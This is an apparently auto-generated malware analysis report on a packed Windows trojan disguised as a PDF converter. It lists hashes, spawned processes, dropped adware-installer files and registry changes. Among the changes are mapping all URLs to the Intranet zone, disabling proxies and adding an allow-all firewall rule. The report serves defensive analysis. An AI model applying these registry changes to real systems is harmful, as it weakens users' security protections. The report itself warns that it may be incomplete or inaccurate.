Gen.Trojan.Heur.jv1I5ix9sdi_0c00fa4f69
Gen:Trojan.Heur.jv1@I5ix9sdi (B) (Emsisoft), Gen:Trojan.Heur.jv1@I5ix9sdi (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 0c00fa4f697edf668ff2f9d92078b309
SHA1: 37f107c35ef69c3ddcadcda1e9d075f4f4454481
SHA256: 8f8d5ef6416196bfd72aba0c4238ddc9b64842c8bb154eaa66f0fc38112c05cc
SSDeep: 24576:CeQxAIEXi6kgaINV7DBl8EWvPR PMQZ6p6HBy/4Ojh3sNzHh0OAkZo:8 IEXiTcN5X8NaL0pCBAV3sVKOAko
Size: 1207384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PDFConverter
Created at: 2014-07-24 11:29:40
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
9.tmp:1968
nsr6.exe:1668
tmppack.exe:1628
2.tmp:500
The Trojan injects its code into the following process(es):
%original file name%.exe:320
Mutexes
The following mutexes were created/opened:
RasPbFile
ShimCacheMutex
{69C867F8-341A-44a8-B8F2-AF392F12143A}974448true
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
_!SHMSFTHISTORY!_
c:!documents and settings!adm!local settings!history!history.ie5!mshist012014082620140827!
File activity
The process 9.tmp:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\broker\broker_check.log (185169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (50 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (0 bytes)
The process %original file name%.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b4.gif (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.gif (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4169.html (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_feature_.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn2.png (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn1.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-right.jpg (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn3.png (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\utils.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b-bg.gif (295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4171.html (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader.gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b3.gif (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\config.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn4.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4176.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4173.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_feature_835.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg.jpg (333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_15.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\smart.js (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery.noselect.min.js (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\events\events.js (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-top.gif (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn2.png (136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery-1.7.min.js (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-bottom.gif (8 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (6403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\speedanalysis.ico (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\mid.jpg (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\trust.gif (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\idsqqskweu (2615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\wizard.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\tmppack.exe (3804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main_old.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-left.jpg (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~39F.tmp (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4175.html (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\check.jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~6.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\old4167.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act.jpg (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\conditions\conditions.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4172.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.png (911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\center2.jpg (305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4174.html (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\template_40.png (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader2.gif (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4166.html (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-right.jpg (468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg.gif (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-left.jpg (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_46.bmp (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_46.bmp (42 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
The process nsr6.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (65457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\Logs\sp_nsr6.log (1847 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (590 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (0 bytes)
The process tmppack.exe:1628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\installer.pak (9606 bytes)
The process 2.tmp:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (72144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GT6VKRAN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPYZIJUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc4.tmp (2821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZUR84N48\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe (72144 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (0 bytes)
Registry activity
The process 9.tmp:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\usyndication.com]
"UID" = "{838DF089-038D-4F4E-A007-4F5D022E1478}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 97 EC 6F 45 67 3A 6D 76 4F D2 88 89 2A 18 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014082620140827\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheRepair" = "0"
"CachePrefix" = ":2014082620140827:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 73 1A 88 EE 4A CD 07 84 72 5B E3 71 12 EF AE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014082620140827]
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Adds a rule to the Windows Firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "C:\%original file name%.exe:*:Enabled:%original file name%.exe (in)"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The process nsr6.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 90 7B 64 4E 34 78 7E 8A 8B 51 3B 8E 47 67 9C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tmppack.exe:1628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE EE C4 A1 9B ED 7F 81 82 1D 80 D2 95 B8 D1 70"
The process 2.tmp:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc5.tmp\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 B4 8A CC B3 0D 3F A0 C1 BF CF 8F E5 6C D5 79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
